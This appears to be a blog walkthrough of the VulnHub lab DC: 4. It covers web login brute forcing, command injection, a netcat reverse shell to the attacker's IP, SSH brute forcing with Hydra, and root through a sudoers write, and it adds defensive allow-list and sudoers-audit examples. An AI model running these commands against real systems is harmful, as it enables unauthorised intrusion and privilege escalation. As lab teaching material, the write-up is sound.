DC: 4 is another vulnerable machine hosted by VulnHub. This one the author rated a little tougher (beginner/intermediate), and that’s probably accurate. It’s not too tough, but there are certainly some things that would throw off beginners. Let’s jump in!
As usual, we will start off with an nmap scan:
nmap -sC -sV -v 192.168.2.113 -oN map1
Here we see that port 22 and 80 are open. We can also see the version of nginx running.
You can run other nmap scans, but this is literally all that’s open. So, let’s check out the web page.
This is interesting, but that’s really all we get. The page source doesn’t reveal anything. Performing scans with gobuster, you can find some other directories and file names, but they all redirect back to this page. This really only leaves us with a couple of options. We can brute force this page, brute force SSH, or try to find an exploit for nginx.
A quick search of nginx vulns doesn’t yield anything. We also don’t have any usernames for SSH. That leaves us with brute forcing this page.
There are a couple ways to go about this. We can use BurpSuite or Hydra. There are some issues though. The free version of BurpSuite will throttle (slow down) the brute force attempt as it goes along. It’s doable, but it takes a while.
Hydra does not have this issue, but the syntax is a lot more complicated. If not done correctly, it will give you false positives (that will actually still work if you keep the session alive).
For this walkthrough, I used BurpSuite Pro. It doesn’t have the throttling issue and is just easier to set up. It will work exactly the same as the free version; there’s just a speed difference. If you want to see how Hydra works with this, you can find a video walkthrough here where I go through it.
So start up BurpSuite, and set your browser proxy for HTTP on 127.0.0.1 port 8080. I use the Firefox extension FoxyProxy, but you can set it in the options menu as well.
Now turn the proxy OFF just for the first interaction and put in admin for the username and test for the password and hit Submit.
The reason we turn it off the first time is because of the way it handles session cookies. You don’t have to turn it off, but then you’ll have to forward the first couple requests. It’s just faster to do it this way.
Now, turn the proxy on, re-enter the credentials, and press submit again. You should catch the request. If you’re trying the hydra route, you’ll need this session cookie and the request string at the bottom.
Now send it to Intruder, either with the right-click menu or by pressing Ctrl+I, and go to the Positions tab.
Now, press the Clear button, highlight the password value (test in this case), and press the Add button.
At this point you should only have the § markers (the squiggly symbols) around test.
Next go to the Payloads tab and press the Load button under the Payload section.
This will prompt for a word list. Do not use the rockyou wordlist in BurpSuite. It’s too big and it will crash. It’s fine for Hydra if you’re going that route.
I’m choosing a list from https://github.com/danielmiessler/SecLists. The nice thing is that the password can be found in many of these lists. I’ll go with the darkweb 2017 top 1000 this time.
Once it’s loaded, press Start attack.
Your output might vary slightly, but happy is the correct password. You’ll notice that every request after the one containing that password also authenticates. This is because of the session cookie: once the session is logged in, every later attempt looks like a success. This is also why Hydra might show false positives.
Making sure that your proxy is off, login with the password happy (or anything else as long as you didn’t reset your session cookie).
Click on the command hyperlink.
On the command screen, you’ll see some options to run. Pick one of them and see what it does.
In my case, I chose to list files and it ran the ls -l command. Let’s catch it with our proxy and see if we can run other commands.
Once the command is caught, send it to Repeater using the right-click menu or by pressing Ctrl+R. Notice that the command string is using a + for a space. We’ll need to remember that for later.
For now, change the command to whoami and click Go.
We have command injection! Let’s get a shell.
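As an added example (not the DC:4 application’s code), here is the pattern that makes a page like this injectable, next to an allow-list version that only runs the menu entries. The form field name radio, the handler names and the extra menu entries besides ls -l are assumptions.

```python
"""Vulnerable-vs-hardened handler for a "pick a command" page like DC:4's.

Added example, not the DC:4 application's code. The form field name
'radio', the handler names and the command menu are constructed here.
"""
import subprocess
from urllib.parse import parse_qs

# The page offers a fixed menu; only these argv lists may ever reach the OS.
ALLOWED_COMMANDS = {
    "ls -l": ["ls", "-l"],
    "df -h": ["df", "-h"],    # constructed menu entries
    "uptime": ["uptime"],
}


def decode_radio(body: str) -> str:
    """Return the 'radio' field of an x-www-form-urlencoded body.

    parse_qs turns '+' into a space, which is why 'ls+-l' in the
    captured request runs as 'ls -l' on the box.
    """
    return parse_qs(body, keep_blank_values=True).get("radio", [""])[0]


def vulnerable_handler(body: str) -> str:
    """The injectable pattern: the decoded field IS the command line.

    Returns the string that would be handed to a shell instead of
    executing it, so this function is safe to call anywhere.
    """
    return decode_radio(body)   # a real page would do system(<this>)


def hardened_handler(body: str) -> list:
    """Map the decoded field to a fixed argv; anything else is rejected."""
    choice = decode_radio(body)
    argv = ALLOWED_COMMANDS.get(choice)
    if argv is None:
        raise ValueError(f"command not permitted: {choice!r}")
    return argv


def run_allowed(body: str) -> str:
    """Execute only an allow-listed choice, and never through a shell."""
    proc = subprocess.run(hardened_handler(body), capture_output=True,
                          text=True, timeout=5, check=False)
    return proc.stdout
```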
There’s a lot of ways you can do this. I used the which command (which netcat) to identify that netcat was on the box and used that.
Start a netcat listener on your attack machine.
nc -nlvp 7777
In the command, put in nc+-nv+192.168.2.30+7777+-e+/bin/bash
Make sure you have the right IP and port for your machine, and that the syntax is correct. An error here can easily hang this box and you’ll have to restart it. If you didn’t get the right password, this would be extra frustrating. 😊
Next press Go and you should be presented with a shell.
Let’s upgrade it with Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Now let’s see what we can get into.
We can’t sudo because we don’t know the www-data password. There’s no database running (like with WordPress) so we can’t look for those credentials. Let’s look at the user directories and see if there’s anything interesting there.
Inside the /home/jim directory there’s a backup folder with a listing of passwords.
Since we have usernames and a password list, let’s brute force SSH starting with Jim’s account.
For this, we’ll use Hydra. Copy over the list first. You can use a variety of methods, but the most straightforward approach is to just copy and paste it. Then launch Hydra:
hydra -l jim -P pass.txt ssh://192.168.2.113
After a little bit, Hydra comes back with the password jibril04.
Now we can ssh in as Jim.
Jim doesn’t have sudo permissions either, so let’s go back to his directory and look at some of the files we couldn’t get to before.
Looking at mbox, we can see a test email sent by root. There seems to be a vulnerable version of Exim running, but I couldn’t get that exploit to work.
Let’s see if there’s other mail we can read in the mail folder. It’s kept in /var/mail.
Inside the mail directory is an email to Jim with Charles’s password. Let’s su to Charles.
Now that we’re Charles, we find that sudo is available for a program called teehee.
Running this program produced something that looked like echo. Whenever a command was entered, it just spit it back out.
Let’s look at the help file.
It looks like it has some sort of file write capabilities, but I was a little lost on how to use it. I also couldn’t find any reference to this binary on Google. I then went to GTFOBins https://gtfobins.github.io/ to see if it was mentioned there.
While they didn’t have anything for teehee, they did have something for tee. That made me think that the binaries might be similar. I did a help on tee.
Notice anything? The help file is exactly the same.
We should be able to use the commands in GTFOBins to get root. The way tee (or teehee in this case) works is that it writes to a file AND to standard output. This is useful when you want to capture the output of a command and see it run at the same time.
In this case, we can use our sudo permissions to write our output to any file. There are some options here. You could write to the shadow file and make yourself root, or you can write to sudoers and sudo to root. I’m going to go the sudo route.
We will echo the parameters we want to write to sudoers and pipe it to teehee which will append the output (the parameter itself) to the sudoers file. It will look like this:
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
Once we have that in, we can sudo to root.
And we’re root!!
Let’s get the flag!
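An added example from the defender’s side (not part of the walkthrough or the box): a small sudoers audit that catches a tee binary granted through sudo under a different name, which is exactly what teehee is here. The sudoers line, paths and binary contents are constructed for the demo.

```python
"""Audit sudoers for file-writing utilities granted under another name.

Added example, not code from the DC:4 walkthrough or box. The rule, paths
and binary contents are constructed; the hash check is what catches a tee
binary installed under a new name such as teehee.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Utilities that write arbitrary files as root (partial, constructed list).
FILE_WRITERS = ("tee", "dd", "cp", "mv")
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
# user  host = (runas) TAG: cmd, cmd ...
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\([^)]*\)\s*)?((?:\w+:\s*)*)(.+)$")


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def parse_rules(text: str):
    """Yield (user, [command paths]) for each user-spec line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP):
            continue
        m = RULE_RE.match(line)
        if m:
            yield m.group(1), [c.split()[0] for c in m.group(4).split(",") if c.strip()]


def audit(sudoers_text: str, bin_dir) -> list:
    """Flag commands that are, or are byte-identical copies of, file writers."""
    bin_dir = Path(bin_dir)
    known = {sha256(bin_dir / n): n for n in FILE_WRITERS if (bin_dir / n).is_file()}
    findings = []
    for user, cmds in parse_rules(sudoers_text):
        for cmd in cmds:
            target = Path(cmd)
            if cmd == "ALL" or target.name in FILE_WRITERS:
                findings.append((user, cmd, f"grants {target.name}"))
            elif target.is_file() and sha256(target) in known:
                findings.append((user, cmd, f"byte-identical to {known[sha256(target)]}"))
    return findings


def demo() -> list:
    """Recreate the teehee case in a temp dir: tee's bytes under a new name."""
    with tempfile.TemporaryDirectory() as d:
        bin_dir = Path(d)
        (bin_dir / "tee").write_bytes(b"\x7fELF stand-in for tee")     # constructed
        (bin_dir / "teehee").write_bytes(b"\x7fELF stand-in for tee")  # same bytes
        return audit(f"charles ALL=(ALL) NOPASSWD: {bin_dir}/teehee\n", bin_dir)
```

On a real host you would point audit() at /etc/sudoers (and the files under /etc/sudoers.d) with bin_dir set to /usr/bin, and compare against the hashes of the distribution’s own coreutils.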
That’s all for DC: 4. It was a little more challenging than the others, but still not too hard for beginners. If you want to see a video walkthrough where I also show how to use Hydra you can find it here.
DC: 5 is next on the list.